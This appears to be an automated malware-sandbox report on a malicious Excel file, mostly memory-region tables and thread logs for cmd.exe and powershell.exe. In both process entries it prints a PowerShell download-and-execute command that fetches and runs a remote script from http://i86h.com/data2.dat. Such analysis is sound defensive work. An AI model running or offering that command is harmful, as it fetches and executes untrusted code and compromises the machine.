| mscoree.dll | 0x6f710000 | 0x6f759fff | Memory Mapped File | rwx |
|
|
|
- |
| gfx.dll | 0x6f760000 | 0x6f90afff | Memory Mapped File | rwx |
|
|
|
- |
| office.odf | 0x70dd0000 | 0x711e9fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr90.dll | 0x712b0000 | 0x71352fff | Memory Mapped File | rwx |
|
|
|
- |
| osppc.dll | 0x71e90000 | 0x71eaffff | Memory Mapped File | rwx |
|
|
|
- |
| msimg32.dll | 0x71eb0000 | 0x71eb4fff | Memory Mapped File | rwx |
|
|
|
- |
| msimtf.dll | 0x72010000 | 0x7201afff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x73780000 | 0x73792fff | Memory Mapped File | rwx |
|
|
|
- |
| gdiplus.dll | 0x73930000 | 0x73abffff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x73ac0000 | 0x73afffff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x73f20000 | 0x73f2cfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74470000 | 0x7460dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x749e0000 | 0x749e8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x753e0000 | 0x753ebfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75630000 | 0x75679fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75790000 | 0x757e6fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75800000 | 0x75809fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75810000 | 0x758b0fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75a00000 | 0x75ac8fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75ad0000 | 0x75aeefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75b50000 | 0x75b9dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75ba0000 | 0x75c73fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75c80000 | 0x75d02fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75d10000 | 0x75dbbfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e10000 | 0x75e28fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e30000 | 0x75efbfff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76d90000 | 0x76eebfff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x76ef0000 | 0x76f8cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x772b0000 | 0x7733efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77340000 | 0x7747bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x774d0000 | 0x7756ffff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77580000 | 0x77580fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 198 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #3: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | CMD.EXE /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -c IEX ((new-object net.webclient).downloadstring(\"http://i86h.com/data2.dat\")) |
| Initial Working Directory | C:\Users\BMe1N39jU1 6criBQ\Documents\ |
| Monitor | Start Time: 00:00:48, Reason: Child Process |
| Unmonitor | End Time: 00:01:20, Reason: Self Terminated |
| Monitor Duration | 00:00:32 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa9c |
| Parent PID | 0x948 (c:\progra~1\micros~1\office14\excel.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | O5ZINUQXJZK\BMe1N39jU1 6criBQ |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AA0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000410000 | 0x00410000 | 0x004d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x005e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x011effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000011f0000 | 0x011f0000 | 0x0147afff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01480000 | 0x0174efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4ab30000 | 0x4ab7bfff | Memory Mapped File | rwx |
|
|
|
- |
| winbrand.dll | 0x6f660000 | 0x6f666fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75630000 | 0x75679fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75800000 | 0x75809fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75a00000 | 0x75ac8fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75ad0000 | 0x75aeefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75b50000 | 0x75b9dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75ba0000 | 0x75c73fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75d10000 | 0x75dbbfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e30000 | 0x75efbfff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x76ef0000 | 0x76f8cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77340000 | 0x7747bfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77580000 | 0x77580fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Threads
Thread 0xaa0
58
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-08-10 12:37:30 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 111306 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\cmd.exe, base_address = 0x4ab30000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x75ba0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x75bf24c2 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 168, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\CMD.EXE, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Program Files\Microsoft Office\Office14\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT |
|
1 | |
| Environment | Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\BMe1N39jU1 6criBQ\Documents, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\BMe1N39jU1 6criBQ\Documents |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x75ba0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x75bdac6c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75be3ea8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75bf2732 |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xab4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #4: powershell.exe
960
49
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -c IEX ((new-object net.webclient).downloadstring(\"http://i86h.com/data2.dat\")) |
| Initial Working Directory | C:\Users\BMe1N39jU1 6criBQ\Documents\ |
| Monitor | Start Time: 00:00:48, Reason: Child Process |
| Unmonitor | End Time: 00:01:20, Reason: Self Terminated |
| Monitor Duration | 00:00:32 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xab4 |
| Parent PID | 0xa9c (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | O5ZINUQXJZK\BMe1N39jU1 6criBQ |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AB8
0x
ABC
0x
AC0
0x
AC4
0x
AC8
0x
ACC
0x
B4C
0x
B50
0x
B54
0x
B58
0x
B9C
0x
BA8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x000e0000 | 0x000e2fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00151fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00160000 | 0x00163fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x00277fff | Pagefile Backed Memory | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x00280000 | 0x0029ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db | 0x002b0000 | 0x002dffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x002f0000 | 0x002f3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000300000 | 0x00300000 | 0x00300fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x00310fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00320fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0033ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x00540fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x0114ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001150000 | 0x01150000 | 0x0115ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001160000 | 0x01160000 | 0x0116ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001170000 | 0x01170000 | 0x0117ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001180000 | 0x01180000 | 0x0118ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001190000 | 0x01190000 | 0x011cffff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000011d0000 | 0x011d0000 | 0x011dffff | Private Memory | - |
|
|
|
- |
| private_0x00000000011e0000 | 0x011e0000 | 0x011effff | Private Memory | rw |
|
|
|
- |
| l_intl.nls | 0x011f0000 | 0x011f2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0120ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001210000 | 0x01210000 | 0x012eefff | Pagefile Backed Memory | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x012f0000 | 0x01355fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001360000 | 0x01360000 | 0x01360fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001370000 | 0x01370000 | 0x013affff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x013b0000 | 0x0167efff | Memory Mapped File | r |
|
|
|
- |
| sorttbls.nlp | 0x01680000 | 0x01684fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x01690000 | 0x01697fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000016a0000 | 0x016a0000 | 0x016a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000016b0000 | 0x016b0000 | 0x016b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000016b0000 | 0x016b0000 | 0x016bffff | Private Memory | - |
|
|
|
- |
| private_0x00000000016c0000 | 0x016c0000 | 0x016cffff | Private Memory | - |
|
|
|
- |
| private_0x00000000016d0000 | 0x016d0000 | 0x0170ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001710000 | 0x01710000 | 0x01b02fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001b10000 | 0x01b10000 | 0x01baffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001bb0000 | 0x01bb0000 | 0x01beffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001bf0000 | 0x01bf0000 | 0x01ceffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001cf0000 | 0x01cf0000 | 0x01d00fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001d10000 | 0x01d10000 | 0x01d1ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001d20000 | 0x01d20000 | 0x01d5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d60000 | 0x01d60000 | 0x01d6ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001d70000 | 0x01d70000 | 0x01d7ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001d80000 | 0x01d80000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x01dc0000 | 0x01e00fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001e10000 | 0x01e10000 | 0x01e1ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001e20000 | 0x01e20000 | 0x01e2ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001e30000 | 0x01e30000 | 0x01e6ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x01e70000 | 0x01f2ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000001f30000 | 0x01f30000 | 0x01f6ffff | Private Memory | rwx |
|
|
|
- |
| system.transactions.dll | 0x01f70000 | 0x01fb2fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorrc.dll | 0x01fc0000 | 0x02013fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002020000 | 0x02020000 | 0x0202ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000002030000 | 0x02030000 | 0x0203ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000002150000 | 0x02150000 | 0x0215ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x0415ffff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x04160000 | 0x04441fff | Memory Mapped File | rwx |
|
|
|
- |
| powershell.exe | 0x22090000 | 0x22101fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x60340000 | 0x60347fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x63730000 | 0x638cdfff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x638d0000 | 0x63b04fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x63b10000 | 0x64389fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.dll | 0x64390000 | 0x64671fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x64680000 | 0x64e1bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x64e20000 | 0x65917fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x65920000 | 0x65ecafff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x66080000 | 0x6611bfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x66120000 | 0x661a4fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.dll | 0x67aa0000 | 0x67ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x6ce40000 | 0x6d375fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x6d440000 | 0x6d553fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x6d560000 | 0x6d663fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x6d670000 | 0x6d70afff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x6d7a0000 | 0x6d820fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x6db20000 | 0x6db44fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x6dc60000 | 0x6dcaafff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x6f190000 | 0x6f198fff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x6f1a0000 | 0x6f1cdfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x6f690000 | 0x6f709fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x6f710000 | 0x6f759fff | Memory Mapped File | rwx |
|
|
|
- |
| shfolder.dll | 0x6f7b0000 | 0x6f7b4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x6f840000 | 0x6f902fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x70440000 | 0x704affff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x704d0000 | 0x704dafff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x717b0000 | 0x717fbfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x71e80000 | 0x71eacfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x73ac0000 | 0x73afffff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x73f30000 | 0x73f39fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x73f60000 | 0x73f73fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74300000 | 0x74320fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74330000 | 0x74424fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74470000 | 0x7460dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x749e0000 | 0x749e8fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x74b40000 | 0x74b56fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x74d00000 | 0x74d3afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74f60000 | 0x74f75fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x753e0000 | 0x753ebfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75490000 | 0x7549afff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75630000 | 0x75679fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75680000 | 0x75691fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x756a0000 | 0x756c6fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75790000 | 0x757e6fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x757f0000 | 0x757f4fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75800000 | 0x75809fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75810000 | 0x758b0fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75a00000 | 0x75ac8fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75ad0000 | 0x75aeefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75b50000 | 0x75b9dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75ba0000 | 0x75c73fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75c80000 | 0x75d02fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75d10000 | 0x75dbbfff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75dc0000 | 0x75e04fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e10000 | 0x75e28fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e30000 | 0x75efbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75f40000 | 0x76b89fff | Memory Mapped File | rwx |
|
|
|
- |
